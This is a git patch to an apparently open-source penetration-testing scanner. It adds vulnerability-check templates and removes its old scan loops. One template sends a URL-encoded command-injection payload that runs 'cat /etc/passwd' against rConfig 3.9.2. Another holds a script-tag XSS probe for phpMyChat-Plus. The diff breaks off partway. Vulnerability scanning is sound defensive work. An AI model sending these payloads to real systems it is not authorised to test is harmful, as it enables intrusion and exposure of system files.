From 1a96b105dbcd0dccb50054e71f90903fec964fe3 Mon Sep 17 00:00:00 2001 From: "@xer0dayz" <1n3@hushmail.com> Date: Mon, 14 Sep 2020 08:25:38 -0700 Subject: [PATCH] * v8.7 - Updated web file bruteforce lists * v8.7 - Added updated Slack API integration/notifications * v8.7 - Added Arachni, Nikto, Nessus, NMap + 20 passive sc0pe vulnerability parsers --- CHANGELOG.md | 5 +++ modes/sc0pe-active-scan.sh | 17 -------- modes/sc0pe-passive-scan.sh | 33 ---------------- .../active/AWS_S3_Public_Bucket_Listing.sh | 9 +++++ ...2_-_rConfig_3.9.2_Remote_Code_Execution.sh | 9 +++++ .../CVE-2019-19908_-_phpMyChat-Plus_XSS.sh | 4 +- .../CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh | 9 +++++ ...0-10204_-_Sonatype_Nexus_Repository_RCE.sh | 9 +++++ ...weeper_WebAdmin_Python_Code_Injection_1.sh | 9 +++++ ...weeper_WebAdmin_Python_Code_Injection_2.sh | 9 +++++ ...0_-_Mida_eFramework_Unauthenticated_RCE.sh | 9 +++++ .../CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh | 4 +- .../CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh | 4 +- .../CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh | 4 +- .../CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh | 4 +- ...2020-2140_-_Jenkin_AuditTrailPlugin_XSS.sh | 9 +++++ ...020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh | 9 +++++ ...TD_Arbitrary_File_Reading_Vulnerability.sh | 2 +- .../active/CVE-2020-5902_-_F5_BIG-IP_XSS.sh | 4 +- ...istrative_User_in_SAP_NetWeaver_AS_JAVA.sh | 9 +++++ ...set_3.15_Unauthenticated_Database_Reset.sh | 2 +- ...I_Toolset_6.01_Remote_Command_Execution.sh | 9 +++++ ...=> CVE-2020-8115_-_Revive_Adserver_XSS.sh} | 0 ...rix_ADC_NetScaler_Gateway_Reflected_XSS.sh | 4 +- .../CVE-2020-8512_-_IceWarp_WebMail_XSS.sh | 9 +++++ ...nes_Unauthenticated_Arbitrary_File_Read.sh | 2 +- .../active/Magento_2.3.0_SQL_Injection.sh | 9 +++++ templates/active/Robots.txt_Detected.sh | 9 +++++ templates/active/Sitemap.xml_Detected.sh | 9 +++++ .../Clear-text_Communications_HTTP.disabled | 8 ---- .../Component_With_Known_Vulnerabilities_1.sh | 8 ---- .../Component_With_Known_Vulnerabilities_2.sh | 8 ---- templates/passive/Default_Credentials_1.sh | 8 ---- templates/passive/Default_Credentials_2.sh | 8 ---- templates/passive/Interesting_Ports_Found.sh | 8 ---- ...18-15473_-_OpenSSH_Username_Enumeration.sh | 9 +++++ .../network/Default_Credentials_BruteX.sh | 9 +++++ .../network/Default_Credentials_NMap.sh | 9 +++++ .../{ => network}/Interesting_Domain_Found.sh | 3 +- .../{ => network}/Lack_of_SPF_DNS_Record.sh | 3 +- .../Possible_Takeover_Detected.sh | 3 +- .../passive/network/SMB_Info_Disclosure.sh | 9 +++++ .../passive/{ => network}/SMBv1_Enabled.sh | 3 +- .../passive/network/SSH_Version_Disclosure.sh | 9 +++++ .../Subjack_Takeover_Detected.sh | 3 +- .../Subover_Takeover_Detected.sh | 3 +- ...onent_With_Known_Vulnerabilities_-_NMap.sh | 12 ++++++ .../recursive/Interesting_Ports_Found.sh | 13 +++++++ .../network/recursive/Nessus_Import.sh | 14 +++++++ .../passive/{ => web}/Autocomplete_Enabled.sh | 0 ...CORS_Policy_-_Allow-Credentials_Enabled.sh | 0 .../CORS_Policy_-_Allow-Origin_Wildcard.sh | 0 templates/passive/web/CSP_Not_Enforced.sh | 21 ++++++++++ .../Clear-text_Communications_HTTP.sh | 2 + templates/passive/{ => web}/Clickjacking.sh | 4 +- .../passive/{ => web}/Drupal_Detected.sh | 2 +- .../{ => web}/Expired_SSL_Certificate.sh | 0 .../Insecure_Cookie_-_HTTPOnly_Not_Set.sh | 0 .../Insecure_Cookie_-_Secure_Not_Set.sh | 0 .../{ => web}/Insecure_SSL_TLS_Connection.sh | 0 ...Insecure_SSL_TLS_Connection_CN_Mismatch.sh | 4 +- .../{ => web}/Interesting_Title_Found.sh | 0 .../{ => web}/Server_Header_Disclosure.sh | 0 .../Strict_Tranposrt_Security_Not_Enforced.sh | 12 ++++++ .../passive/{ => web}/Trace_Method_Enabled.sh | 0 .../{ => web}/X-Powered-By_Header_Found.sh | 0 .../Arachni_Vulnerability_Scan_-_HTTP.sh | 39 +++++++++++++++++++ .../Arachni_Vulnerability_Scan_-_HTTPS.sh | 39 +++++++++++++++++++ .../Nikto_Vulnerability_Scan-HTTP.sh | 12 ++++++ .../Nikto_Vulnerability_Scan-HTTPS.sh | 12 ++++++ 70 files changed, 396 insertions(+), 125 deletions(-) delete mode 100644 modes/sc0pe-active-scan.sh delete mode 100644 modes/sc0pe-passive-scan.sh create mode 100644 templates/active/AWS_S3_Public_Bucket_Listing.sh create mode 100644 templates/active/CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh create mode 100644 templates/active/CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh create mode 100644 templates/active/CVE-2020-10204_-_Sonatype_Nexus_Repository_RCE.sh create mode 100644 templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_1.sh create mode 100644 templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_2.sh create mode 100644 templates/active/CVE-2020-15920_-_Mida_eFramework_Unauthenticated_RCE.sh create mode 100644 templates/active/CVE-2020-2140_-_Jenkin_AuditTrailPlugin_XSS.sh create mode 100644 templates/active/CVE-2020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh create mode 100644 templates/active/CVE-2020-6287_-_Create_an_Administrative_User_in_SAP_NetWeaver_AS_JAVA.sh create mode 100644 templates/active/CVE-2020-7209_-_LinuxKI_Toolset_6.01_Remote_Command_Execution.sh rename templates/active/{CVE-2020-8115_-_Revive_Adserver_XSS.disabled => CVE-2020-8115_-_Revive_Adserver_XSS.sh} (100%) create mode 100644 templates/active/CVE-2020-8512_-_IceWarp_WebMail_XSS.sh create mode 100644 templates/active/Magento_2.3.0_SQL_Injection.sh create mode 100644 templates/active/Robots.txt_Detected.sh create mode 100644 templates/active/Sitemap.xml_Detected.sh delete mode 100644 templates/passive/Clear-text_Communications_HTTP.disabled delete mode 100644 templates/passive/Component_With_Known_Vulnerabilities_1.sh delete mode 100644 templates/passive/Component_With_Known_Vulnerabilities_2.sh delete mode 100644 templates/passive/Default_Credentials_1.sh delete mode 100644 templates/passive/Default_Credentials_2.sh delete mode 100644 templates/passive/Interesting_Ports_Found.sh create mode 100644 templates/passive/network/CVE-2018-15473_-_OpenSSH_Username_Enumeration.sh create mode 100644 templates/passive/network/Default_Credentials_BruteX.sh create mode 100644 templates/passive/network/Default_Credentials_NMap.sh rename templates/passive/{ => network}/Interesting_Domain_Found.sh (85%) rename templates/passive/{ => network}/Lack_of_SPF_DNS_Record.sh (84%) rename templates/passive/{ => network}/Possible_Takeover_Detected.sh (93%) create mode 100644 templates/passive/network/SMB_Info_Disclosure.sh rename templates/passive/{ => network}/SMBv1_Enabled.sh (82%) create mode 100644 templates/passive/network/SSH_Version_Disclosure.sh rename templates/passive/{ => network}/Subjack_Takeover_Detected.sh (93%) rename templates/passive/{ => network}/Subover_Takeover_Detected.sh (93%) create mode 100644 templates/passive/network/recursive/Component_With_Known_Vulnerabilities_-_NMap.sh create mode 100644 templates/passive/network/recursive/Interesting_Ports_Found.sh create mode 100644 templates/passive/network/recursive/Nessus_Import.sh rename templates/passive/{ => web}/Autocomplete_Enabled.sh (100%) rename templates/passive/{ => web}/CORS_Policy_-_Allow-Credentials_Enabled.sh (100%) rename templates/passive/{ => web}/CORS_Policy_-_Allow-Origin_Wildcard.sh (100%) create mode 100644 templates/passive/web/CSP_Not_Enforced.sh rename templates/passive/{ => web}/Clear-text_Communications_HTTP.sh (94%) rename templates/passive/{ => web}/Clickjacking.sh (96%) rename templates/passive/{ => web}/Drupal_Detected.sh (74%) rename templates/passive/{ => web}/Expired_SSL_Certificate.sh (100%) rename templates/passive/{ => web}/Insecure_Cookie_-_HTTPOnly_Not_Set.sh (100%) rename templates/passive/{ => web}/Insecure_Cookie_-_Secure_Not_Set.sh (100%) rename templates/passive/{ => web}/Insecure_SSL_TLS_Connection.sh (100%) rename templates/passive/{ => web}/Insecure_SSL_TLS_Connection_CN_Mismatch.sh (95%) rename templates/passive/{ => web}/Interesting_Title_Found.sh (100%) rename templates/passive/{ => web}/Server_Header_Disclosure.sh (100%) create mode 100644 templates/passive/web/Strict_Tranposrt_Security_Not_Enforced.sh rename templates/passive/{ => web}/Trace_Method_Enabled.sh (100%) rename templates/passive/{ => web}/X-Powered-By_Header_Found.sh (100%) create mode 100644 templates/passive/web/recursive/Arachni_Vulnerability_Scan_-_HTTP.sh create mode 100644 templates/passive/web/recursive/Arachni_Vulnerability_Scan_-_HTTPS.sh create mode 100644 templates/passive/web/recursive/Nikto_Vulnerability_Scan-HTTP.sh create mode 100644 templates/passive/web/recursive/Nikto_Vulnerability_Scan-HTTPS.sh diff --git a/CHANGELOG.md b/CHANGELOG.md index bf53275..ff74a1b 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,6 +1,11 @@ ## CHANGELOG: * v8.7 - Updated web file bruteforce lists * v8.7 - Added updated Slack API integration/notifications +* v8.7 - Added Arachni, Nikto, Nessus, NMap + 20 passive sc0pe vulnerability parsers +* v8.7 - Added Revive Adserver XSS sc0pe template +* v8.7 - Added IceWarp Webmail XSS sc0pe template +* v8.7 - Added Mara CMS v7.5 XSS sc0pe template +* v8.7 - Added Administrative Privilege Escalation in SAP NetWeaver * v8.7 - Added Magento 2.3.0 SQL Injection sc0pe template * v8.7 - Added CVE-2020-15920 - Unauthenticated RCE at Mida eFramework sc0pe template * v8.7 - Added CVE-2019-7192 - QNAP Pre-Auth Root RCE sc0pe template diff --git a/modes/sc0pe-active-scan.sh b/modes/sc0pe-active-scan.sh deleted file mode 100644 index 48edb7f..0000000 --- a/modes/sc0pe-active-scan.sh +++ /dev/null @@ -1,17 +0,0 @@ - for file in `ls $INSTALL_DIR/templates/active/*.sh 2> /dev/null`; do - source $file - OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') - #echo $file - if [[ "$SSL" == "true" ]]; then - if [[ -z "$PORT" ]]; then - PORT="443" - fi - curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://$TARGET:$PORT/$URI" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "[+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/ /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out | sed -r "s/> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null - else - if [[ -z "$PORT" ]]; then - PORT="80" - fi - curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://$TARGET:$PORT/$URI" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "[+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/ /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out | sed -r "s/> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null - fi - rm -f /tmp/match.out 2> /dev/null - done \ No newline at end of file diff --git a/modes/sc0pe-passive-scan.sh b/modes/sc0pe-passive-scan.sh deleted file mode 100644 index 7ecb59e..0000000 --- a/modes/sc0pe-passive-scan.sh +++ /dev/null @@ -1,33 +0,0 @@ - for file in `ls $INSTALL_DIR/templates/passive/*.sh 2> /dev/null`; do - #echo $file - source $file - OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') - - if [[ "$SEARCH" == "negative" ]]; then - if [[ "$SSL" == "true" ]]; then - if [[ -z "$PORT" ]]; then - PORT="443" - fi - cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out || echo "[+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/ /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null - else - if [[ -z "$PORT" ]]; then - PORT="80" - fi - cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out || echo "[+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/ /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null - fi - else - #echo $file - if [[ "$SSL" == "true" ]]; then - if [[ -z "$PORT" ]]; then - PORT="443" - fi - cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "[+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/ /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null - else - if [[ -z "$PORT" ]]; then - PORT="80" - fi - cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "[+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/ /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null - fi - fi - rm -f /tmp/match.out 2> /dev/null - done \ No newline at end of file diff --git a/templates/active/AWS_S3_Public_Bucket_Listing.sh b/templates/active/AWS_S3_Public_Bucket_Listing.sh new file mode 100644 index 0000000..9c69f2a --- /dev/null +++ b/templates/active/AWS_S3_Public_Bucket_Listing.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='AWS S3 Public Bucket Listing' +URI='' +METHOD='GET' +MATCH="listbucket" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh b/templates/active/CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh new file mode 100644 index 0000000..b868b0c --- /dev/null +++ b/templates/active/CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution' +URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23' +METHOD='GET' +MATCH='root\:' +SEVERITY='P1 - CRITICAL' +CURL_OPTS='--user-agent "" -s -L --insecure' +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh b/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh index 7f55747..9869219 100644 --- a/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh +++ b/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh @@ -1,8 +1,8 @@ AUTHOR='@xer0dayz' VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS' -URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C" +URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E" METHOD='GET' -MATCH="" +MATCH="